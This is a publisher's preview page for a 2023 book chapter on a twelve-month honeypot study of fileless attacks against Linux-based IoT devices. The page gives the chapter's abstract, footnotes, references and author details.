Skip to main content
SpringerLink
Log in

Understanding IoT Security with HoneyCloud

  • Chapter
  • First Online:
Content Distribution for Mobile Internet: A Cloud-based Approach

  • 174 Accesses

Abstract

With the wide adoption, Linux-based IoT devices have emerged as one primary target of today’s cyber-attacks. Traditional malware-based attacks can quickly spread across these devices, but they are well-understood threats with effective defense techniques such as malware fingerprinting and community-based fingerprint sharing. Recently, fileless attacks—attacks that do not rely on malware files—have been increasing on Linux-based IoT devices and posing significant threats to the security and privacy of IoT systems. Little has been known in terms of their characteristics and attack vectors, which hinders research and development efforts to defend against them. In this chapter, we present our endeavor in understanding fileless attacks on Linux-based IoT devices in the wild. Over a span of twelve months, we deploy 4 hardware IoT honeypots and 108 specially designed software IoT honeypots and successfully attract a wide variety of real-world IoT attacks. We present our measurement study on these attacks, with a focus on fileless attacks, including the prevalence, exploits, environments, and impacts. Our study further leads to multifold insights toward actionable defense strategies that can be adopted by IoT vendors and end users.

This is a preview of subscription content, log in via an institution to check access.

Access this chapter

Log in via an institution
Chapter
USD 29.95
Price excludes VAT (USA)
  • Available as PDF
  • Read on any device
  • Instant download
  • Own it forever
eBook
USD 149.00
Price excludes VAT (USA)
  • Available as EPUB and PDF
  • Read on any device
  • Instant download
  • Own it forever
Softcover Book
USD 199.99
Price excludes VAT (USA)
  • Compact, lightweight edition
  • Dispatched in 3 to 5 business days
  • Free shipping worldwide - see info
Hardcover Book
USD 199.99
Price excludes VAT (USA)
  • Durable hardcover edition
  • Dispatched in 3 to 5 business days
  • Free shipping worldwide - see info

Tax calculation will be finalised at checkout

Purchases are for personal use only

Institutional subscriptions

Notes

  1. 1.

    The rest of connections (i.e., 89.4% of the observed suspicious connections) cannot intrude into our honeypots, since they failed to crack the passwords of our honeypots.

  2. 2.

    Different from previous studies on IoT attacks where fileless attacks were scarcely reported, our honeypots captured substantially more fileless attacks with diverse features. Also, we find that a root cause lies in the weak authentication issue of today’s IoT devices, which makes it unprecedentedly easy for attackers to obtain remote control and then perform malicious actions without using malware.

  3. 3.

    For honeypots deployed in public clouds, the situation can be slightly different since VM instances can report diagnostic data (which are of course legitimate) to cloud providers. Fortunately, such traffic can be easily recognized and we do not consider it in our analysis.

  4. 4.

    A successful login is counted as an effective attack. If any file is downloaded (via wget), it is counted as a malware-based attack. If no file is downloaded but any command is executed, it is counted as a fileless attack.

  5. 5.

    After performing port scanning using nmap, Alibaba Cloud blocked our SSH connection from the same machine.

  6. 6.

    Broadcom and Atheros have made lots of MIPS SoCs for WiFi routers. Ingenic also provides various MIPS solutions.

  7. 7.

    There are a number of PowerPC-based set-top boxes and game consoles like Wii and PlayStation.

  8. 8.

    SPARC-based SoCs have been produced over years, such as LEON.

  9. 9.

    https://twitter.com/freebitco/status/923298533972652032.

  10. 10.

    Since the collected data were encrypted, we did not have direct, ideal evidence but actually noticed that the patterns well matched. Note that the SSH tunnel is used for forwarding data and does not involve shell interactions, so we cannot decrypt the data using the Shell Interceptor and Inference Terminal (Sect. 9.2.3.2).

References

  1. Zhou Z, Wu C, Yang Z, Liu Y (2015) Sensorless sensing with WiFi. Tsinghua Sci Tech 20(1):1–6

    Article  Google Scholar 

  2. Han J, Pan S, Sinha MK, Noh HY, Zhang P, et al. (2018) Smart home occupant identification via sensor fusion across on-object devices. ACM Trans Sensor Netw 14(3–4):23:1–23:22

    Google Scholar 

  3. Internet of Things Security Research Report (2017) http://www.nsfocus.com.cn/upload/contents/2017/12/20171205171653_35944.pdf

  4. New Trends in the World of IoT Threats (2019) https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/

  5. Antonakakis M, April T, Bailey M, Bernhard M, Bursztein E, et al. (2017) Understanding the Mirai botnet. In: Proceedings of USENIX security

    Google Scholar 

  6. Gandotra E, Bansal D, Sofat S (2014) Malware analysis and classification: A survey. J Inf Secur 05:56–64

    Google Scholar 

  7. MMD-0062-2017 - Credential Harvesting by SSH Direct TCP Forward Attack via IoT Botnet (2017). http://blog.malwaremustdie.org/2017/02/mmd-0062-2017-ssh-direct-tcp-forward-attack.html

  8. Zhu T, Ma Q, Zhang S, Liu Y (2014) Context-free attacks using keyboard acoustic emanations. In: Proceedings of ACM CCS

    Google Scholar 

  9. McAfee Labs: Cybercriminal Tactics Shifting From External Malware Threats to ‘fileless’ Attacks (1982) https://www.dqindia.com/mcafee-labs-cybercriminal-tactics-shifting-external-malware-threats-fileless-attacks/

  10. Now You See Me: Exposing Fileless Malware – Microsoft Secure. https://cloudblogs.microsoft.com/microsoftsecure/2018/01/24/now-you-see-me-exposing-fileless-malware/

  11. Spitzner L (2003) Honeypots: Tracking hackers, vol 1. Addison-Wesley Reading

    Google Scholar 

  12. Provos N (2004) A virtual honeypot framework. In: Proceedings of USENIX security

    Google Scholar 

  13. Dang F, Li Z, Liu Y, Zhai E, Chen QA, Xu T, Chen Y, Yang J (2019) Understanding fileless attacks on Linux-based IoT devices with HoneyCloud. In: Proceedings of ACM MobiSys, pp 482–493

    Google Scholar 

  14. International Organisation for Standardization (ISO) (2016) ISO/IEC 20922:2016 Information technology – Message Queuing Telemetry Transport (MQTT) v3.1.1. http://www.iso.org

  15. Linux - easy way to determine virtualization technology - Unix & Linux stack exchange. https://unix.stackexchange.com/questions/89714/easy-way-to-determine-virtualization-technology

  16. Pa YMP, Suzuki S, Yoshioka K, Matsumoto T, Kasama T, et al. (2015) IoTPOT: Analysing the rise of IoT compromises. In: Proceedings of USENIX WOOT

    Google Scholar 

  17. Raffetseder T, Kruegel C, Kirda E (2007) Detecting system emulators. In: Proceedings of ISC

    Google Scholar 

  18. QEMU emulation detection. https://wiki.koeln.ccc.de/images/d/d5/Openchaos_qemudetect.pdf

  19. NVD - CVE-2018-7262. https://nvd.nist.gov/vuln/detail/CVE-2018-7262

  20. Loi F, Sivanathan A, Gharakheili HH, Radford A, Sivaraman V (2017) Systematically evaluating security and privacy for consumer IoT devices. In: Proceedings of ACM IoT S&P

    Google Scholar 

  21. Donno MD, Dragoni N, Giaretta A, Spognardi A (2018) DDoS-capable IoT malwares: Comparative analysis and Mirai investigation. Secur Commun Networks 7178164:1–7178164:30

    Google Scholar 

  22. Santry DJ, Feeley MJ, Hutchinson NC, Veitch AC (1999) Elephant: The file system that never forgets. In: Proceedings of ACM HotOS

    Google Scholar 

Download references

Author information

Authors and Affiliations

  1. Tsinghua University, Beijing, Beijing, China

    Zhenhua Li

  2. Peking University, Beijing, Beijing, China

    Yafei Dai

  3. Shanghai Jiao Tong University, Shanghai, Shanghai, China

    Guihai Chen

  4. Tsinghua University, Beijing, Beijing, China

    Yunhao Liu

Authors
  1. Zhenhua Li
    View author publications

    You can also search for this author in PubMed Google Scholar

  2. Yafei Dai
    View author publications

    You can also search for this author in PubMed Google Scholar

  3. Guihai Chen
    View author publications

    You can also search for this author in PubMed Google Scholar

  4. Yunhao Liu
    View author publications

    You can also search for this author in PubMed Google Scholar

Rights and permissions

Reprints and permissions

Copyright information

© 2023 The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd.

About this chapter

Cite this chapter

Li, Z., Dai, Y., Chen, G., Liu, Y. (2023). Understanding IoT Security with HoneyCloud. In: Content Distribution for Mobile Internet: A Cloud-based Approach. Springer, Singapore. https://doi.org/10.1007/978-981-19-6982-9_9

Download citation

  • DOI: https://doi.org/10.1007/978-981-19-6982-9_9

  • Published:

  • Publisher Name: Springer, Singapore

  • Print ISBN: 978-981-19-6981-2

  • Online ISBN: 978-981-19-6982-9

  • eBook Packages: Computer ScienceComputer Science (R0)

Publish with us

Policies and ethics

Search

Navigation